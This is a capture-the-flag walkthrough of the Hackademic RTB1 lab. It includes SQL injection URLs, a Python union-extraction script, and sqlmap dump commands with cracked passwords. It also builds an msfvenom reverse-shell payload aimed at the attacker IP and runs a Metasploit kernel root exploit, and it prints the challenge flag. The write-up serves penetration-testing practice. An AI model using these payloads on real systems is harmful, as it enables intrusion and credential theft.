I. Target information
Name: Hackademic: RTB1 (medium difficulty)
Date release: 6 Sep 2011
Author: mr.pr0n
Series: Hackademic
Target IP: 192.168.33.130
II. Information gathering
1. Port scan
nmap -sV 192.168.33.130
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-21 07:18 EST
Nmap scan report for 192.168.33.130
Host is up (0.00021s latency).
Not shown: 988 filtered tcp ports (no-response), 10 filtered tcp ports (host-prohibited)
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:B9:22:10 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.47 seconds
Port 22 is closed (the scan reports it closed, not open), so SSH is not a way in; port 80 runs Apache httpd 2.2.15 and the banner identifies the target as Fedora. Everything has to go through the web server.
2. Browsing the web app, the page at http://192.168.33.130/Hackademic_RTB1/?cat=1 turns out to be SQL-injectable.
3. Directory scan
Scanning the web root turns up nothing usable, only a set of 403s (including the phpMyAdmin paths):
└─# python dirsearch.py -u http://192.168.33.130/
dirsearch v0.4.2.6
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11347
Output File: /root/Desktop/目录扫描/dirsearch/reports/192.168.33.130/__23-02-21_19-14-24.txt
Target: http://192.168.33.130/
[19:14:24] Starting:
[19:14:25] 403 - 293B - /.ht_wsr.txt
[19:14:25] 403 - 296B - /.htaccess.bak1
[19:14:25] 403 - 296B - /.htaccess_orig
[19:14:25] 403 - 296B - /.htaccess.save
[19:14:25] 403 - 298B - /.htaccess.sample
[19:14:25] 403 - 296B - /.htaccess.orig
[19:14:25] 403 - 294B - /.htaccessOLD
[19:14:25] 403 - 294B - /.htaccess_sc
[19:14:25] 403 - 286B - /.htm
[19:14:25] 403 - 287B - /.html
[19:14:25] 403 - 295B - /.htaccessOLD2
[19:14:25] 403 - 297B - /.htaccess_extra
[19:14:25] 403 - 296B - /.htpasswd_test
[19:14:25] 403 - 293B - /.httr-oauth
[19:14:25] 403 - 292B - /.htpasswds
[19:14:25] 403 - 294B - /.htaccessBAK
[19:14:33] 403 - 290B - /cgi-bin/
[19:14:36] 403 - 288B - /error/
[19:14:38] 200 - 1KB - /index.html
[19:14:42] 403 - 292B - /phpMyAdmin
[19:14:42] 403 - 292B - /phpmyadmin
[19:14:43] 403 - 293B - /phpmyadmin/
[19:14:43] 403 - 293B - /phpMyAdmin/
[19:14:43] 403 - 313B - /phpmyadmin/docs/html/index.html
[19:14:43] 403 - 302B - /phpmyadmin/ChangeLog
[19:14:43] 403 - 302B - /phpmyadmin/index.php
[19:14:43] 403 - 312B - /phpmyadmin/doc/html/index.html
[19:14:43] 403 - 310B - /phpMyAdmin/scripts/setup.php
[19:14:43] 403 - 313B - /phpMyAdmin/phpMyAdmin/index.php
[19:14:43] 403 - 313B - /phpmyadmin/phpmyadmin/index.php
[19:14:43] 403 - 299B - /phpmyadmin/README
[19:14:43] 403 - 310B - /phpmyadmin/scripts/setup.php
[19:14:43] 403 - 302B - /phpMyAdmin/index.php
Task Completed
Scanning the application directory instead shows a WordPress install (readme.html, wp-admin, wp-includes, xmlrpc.php) and its backend login page, wp-login.php:
└─# python dirsearch.py -u http://192.168.33.130/Hackademic_RTB1/
dirsearch v0.4.2.6
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11347
Output File: /root/Desktop/目录扫描/dirsearch/reports/192.168.33.130/_Hackademic_RTB1__23-02-21_19-17-57.txt
Target: http://192.168.33.130/Hackademic_RTB1/
[19:17:57] Starting:
[19:17:58] 403 - 309B - /Hackademic_RTB1/.ht_wsr.txt
[19:17:58] 403 - 314B - /Hackademic_RTB1/.htaccess.sample
[19:17:58] 403 - 312B - /Hackademic_RTB1/.htaccess.bak1
[19:17:58] 403 - 312B - /Hackademic_RTB1/.htaccess_orig
[19:17:58] 403 - 312B - /Hackademic_RTB1/.htaccess.save
[19:17:58] 403 - 310B - /Hackademic_RTB1/.htaccessOLD
[19:17:58] 403 - 311B - /Hackademic_RTB1/.htaccessOLD2
[19:17:58] 403 - 312B - /Hackademic_RTB1/.htaccess.orig
[19:17:58] 403 - 313B - /Hackademic_RTB1/.htaccess_extra
[19:17:58] 403 - 310B - /Hackademic_RTB1/.htaccessBAK
[19:17:58] 403 - 303B - /Hackademic_RTB1/.html
[19:17:58] 403 - 302B - /Hackademic_RTB1/.htm
[19:17:58] 403 - 308B - /Hackademic_RTB1/.htpasswds
[19:17:58] 403 - 309B - /Hackademic_RTB1/.httr-oauth
[19:17:58] 403 - 312B - /Hackademic_RTB1/.htpasswd_test
[19:17:58] 403 - 310B - /Hackademic_RTB1/.htaccess_sc
[19:18:11] 500 - 2KB - /Hackademic_RTB1/index.php
[19:18:11] 404 - 2KB - /Hackademic_RTB1/index.php/login/
[19:18:12] 200 - 15KB - /Hackademic_RTB1/license.txt
[19:18:17] 200 - 9KB - /Hackademic_RTB1/readme.html
[19:18:24] 301 - 335B - /Hackademic_RTB1/wp-admin -> http://192.168.33.130/Hackademic_RTB1/wp-admin/
[19:18:24] 200 - 184B - /Hackademic_RTB1/wp-admin/setup-config.php
[19:18:24] 200 - 0B - /Hackademic_RTB1/wp-config.php
[19:18:24] 200 - 1KB - /Hackademic_RTB1/wp-admin/install.php
[19:18:24] 302 - 0B - /Hackademic_RTB1/wp-admin/ -> /Hackademic_RTB1/wp-login.php?redirect_to=%2FHackademic_RTB1%2Fwp-admin%2F
[19:18:24] 200 - 1KB - /Hackademic_RTB1/wp-content/
[19:18:24] 301 - 337B - /Hackademic_RTB1/wp-content -> http://192.168.33.130/Hackademic_RTB1/wp-content/
[19:18:24] 500 - 0B - /Hackademic_RTB1/wp-content/plugins/hello.php
[19:18:24] 301 - 338B - /Hackademic_RTB1/wp-includes -> http://192.168.33.130/Hackademic_RTB1/wp-includes/
[19:18:24] 200 - 0B - /Hackademic_RTB1/wp-includes/rss-functions.php
[19:18:24] 200 - 6KB - /Hackademic_RTB1/wp-includes/
[19:18:24] 200 - 1KB - /Hackademic_RTB1/wp-login.php
[19:18:24] 200 - 2KB - /Hackademic_RTB1/wp.php
[19:18:24] 200 - 1KB - /Hackademic_RTB1/wp-register.php
[19:18:24] 200 - 42B - /Hackademic_RTB1/xmlrpc.php
III. SQL injection
Testing http://192.168.33.130/Hackademic_RTB1/?cat=1 for SQL injection:
http://192.168.33.130/Hackademic_RTB1/?cat=1 order by 5
ORDER BY probing gives the column count: 5 is the highest value that still renders the page normally, so the query selects 5 columns.
http://192.168.33.130/Hackademic_RTB1/?cat=1%20and%201=2%20union%20select%201,(select%20group_concat(schema_name)%20from%20information_schema.schemata),3,4,5
The `and 1=2` empties the real result set, and the UNION SELECT returns the list of databases in column 2.
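The two manual requests above are one instance of a general procedure: probe the column count with ORDER BY, then use `and 1=2 union select` to carry a subquery into one of the columns. The following is an added Python example, mine rather than code from the write-up or from the target, that runs that procedure against a constructed in-memory SQLite stand-in for the target's query: a five-column posts table (matching the `order by 5` result), a wp_users table seeded with two of the credentials dumped later, and `sqlite_master` playing the role of `information_schema.schemata`. The hardened variant at the end shows the parameterised query that defeats both payloads.

```python
import sqlite3
from typing import Callable, Optional, Tuple

# (rows, error): a fetch returns either a result set or the database's error text
FetchResult = Tuple[Optional[list], Optional[str]]


def make_vulnerable_backend() -> Callable[[str], FetchResult]:
    """Constructed stand-in for the target: the same five-column shape the
    page's `order by 5` probe implies, plus a wp_users table (assumed layout)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE posts(id INTEGER, cat INTEGER, title TEXT, body TEXT, author TEXT);
        INSERT INTO posts VALUES (1, 1, 'Hello world', 'first post', 'NickJames');
        INSERT INTO posts VALUES (2, 2, 'Second post', 'other category', 'MaxBucky');
        CREATE TABLE wp_users(user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES ('NickJames', 'admin'), ('GeorgeMiller', 'q1w2e3');
    """)

    def fetch(cat: str) -> FetchResult:
        # The bug: the ?cat= value is pasted straight into the SQL text.
        sql = "SELECT id, cat, title, body, author FROM posts WHERE cat=" + cat
        try:
            return db.execute(sql).fetchall(), None
        except sqlite3.Error as exc:
            return None, str(exc)

    return fetch


def find_column_count(fetch: Callable[[str], FetchResult], max_cols: int = 20) -> int:
    """ORDER BY probing: ORDER BY n works while n <= column count and errors past it."""
    count = 0
    for n in range(1, max_cols + 1):
        _, err = fetch(f"1 ORDER BY {n}")
        if err:
            break
        count = n
    return count


def union_extract(fetch: Callable[[str], FetchResult], ncols: int,
                  subquery: str, slot: int = 2) -> Optional[str]:
    """Mirror of the page's payload: 'and 1=2' empties the real result set, then
    UNION SELECT returns our subquery in column `slot` of an ncols-wide row."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[slot - 1] = f"({subquery})"
    rows, err = fetch("1 AND 1=2 UNION SELECT " + ", ".join(cols))
    if err or not rows:
        return None
    return str(rows[0][slot - 1])


def make_hardened_backend() -> Callable[[str], FetchResult]:
    """The fix: type-check the value and bind it as a parameter, so the
    injection string never reaches the SQL parser."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts(id INTEGER, cat INTEGER, title TEXT, body TEXT, author TEXT)")
    db.execute("INSERT INTO posts VALUES (1, 1, 'Hello world', 'first post', 'NickJames')")

    def fetch(cat: str) -> FetchResult:
        try:
            cat_id = int(cat)  # rejects "1 ORDER BY 6" and "1 AND 1=2 UNION ..."
        except ValueError:
            return None, "cat must be an integer"
        rows = db.execute(
            "SELECT id, cat, title, body, author FROM posts WHERE cat=?", (cat_id,)
        ).fetchall()
        return rows, None

    return fetch


if __name__ == "__main__":
    fetch = make_vulnerable_backend()
    n = find_column_count(fetch)  # 5, like `order by 5` on the page
    tables = union_extract(fetch, n, "SELECT group_concat(name) FROM sqlite_master WHERE type='table'")
    creds = union_extract(fetch, n, "SELECT group_concat(user_login || ':' || user_pass) FROM wp_users")
    print(n, tables, creds)
    print(union_extract(make_hardened_backend(), n, "SELECT 1"))  # None: payload rejected
```

`find_column_count` stops at the first ORDER BY error, which is exactly what you do by hand in the browser. Against a real target, replace the `fetch` closure with one that issues the HTTP request and maps "page rendered" to rows and "error page" to an error; the probing and union logic stay the same.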
Or hand the whole thing to sqlmap:
└─# sqlmap -u "http://192.168.33.130/Hackademic_RTB1/?cat=1" --dbs --batch
└─# sqlmap -u "http://192.168.33.130/Hackademic_RTB1/?cat=1" -D wordpress --tables --batch
└─# sqlmap -u "http://192.168.33.130/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users --columns --batch
└─# sqlmap -u "http://192.168.33.130/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users --dump --batch
The dumped wp_users rows (wp_users stores password hashes; the plaintexts below are what cracking those hashes recovered):
|No.|Username|Password|
|-------|-------|-------|
|1|NickJames|admin|
|2|MaxBucky|kernel|
|3|JasonKonnors|maxwell|
|4|TonyBlack|napoleon|
|5|GeorgeMiller|q1w2e3|
IV. Getting a shell
Trying the cracked credentials on wp-login.php, GeorgeMiller turns out to be the account with rights over the site settings. Under Options -> Miscellaneous, add php to the allowed upload file types, then upload the webshell through Upload.
Generate the PHP payload:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.33.129 lport=6789 -f raw > ./shell.php
Start the listener (a multi/handler for the same payload, LHOST 192.168.33.129, LPORT 6789).
Requesting the URL of the uploaded file runs the payload and the session comes in.
Checking the kernel version shows 2.6.3
Privilege escalation
The foothold is a PHP meterpreter, so Metasploit warns that the session architecture does not match the local exploit module. The module still goes through: it drops its exploit file under /tmp, launches it through the existing session, and the new session comes back as root. A kernel exploit that fails can panic the box and take the only foothold with it, so confirm the kernel release matches the module's window before running it.
msf6 > search 2.6.3
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/hp_mpa_job_acct 2011-12-21 excellent Yes HP Managed Printing Administration jobAcct Remote Command Execution
1 exploit/linux/local/sock_sendpage 2009-08-13 great Yes Linux Kernel Sendpage Local Privilege Escalation
2 exploit/linux/local/rds_rds_page_copy_user_priv_esc 2010-10-20 great Yes Reliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation
3 auxiliary/admin/http/telpho10_credential_dump 2016-09-02 normal No Telpho10 Backup Credentials Dumper
Interact with a module by name or index. For example info 3, use 3 or use auxiliary/admin/http/telpho10_credential_dump
msf6 > use exploit/linux/local/rds_rds_page_copy_user_priv_esc
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set session 1
session => 1
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set lport 6789
lport => 6789
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set lhost 192.168.33.129
lhost => 192.168.33.129
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run
[!] SESSION may not be compatible with this module:
[!] * incompatible session architecture: php
[*] Started reverse TCP handler on 192.168.33.129:6789
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Writing '/tmp/.w2iBkASs' (235 bytes) ...
[*] Launching exploit...
[*] Sending stage (1017704 bytes) to 192.168.33.130
[*] Meterpreter session 2 opened (192.168.33.129:6789 -> 192.168.33.130:56310) at 2023-02-21 20:03:55 -0500
meterpreter > shell
Process 4879 created.
Channel 1 created.
whoami
root
ls
plugins
shell.php
themes
cd /
ls
bin
boot
dev
etc
home
lib
lost+found
media
mnt
opt
proc
root
sbin
selinux
srv
sys
tmp
usr
var
cd /root
ls
Desktop
anaconda-ks.cfg
key.txt
key.txt~
cat key.txt
Yeah!!
You must be proud because you 've got the password to complete the First *Realistic* Hackademic Challenge (Hackademic.RTB1) :)
$_d&jgQ>>ak\#b"(Hx"o<la_%
Regards,
mr.pr0n || p0wnbox.Team || 2011
http://p0wnbox.com
V. Summary
The attack path ran from the SQL injection in the ?cat= parameter, which dumped the account credentials from the database, through the directory scan that located the WordPress login page, to an upload point for a reverse-shell file that gave a shell, and finally a Linux kernel exploit for root. Next steps: study sqlmap in more depth and practise privilege-escalation techniques.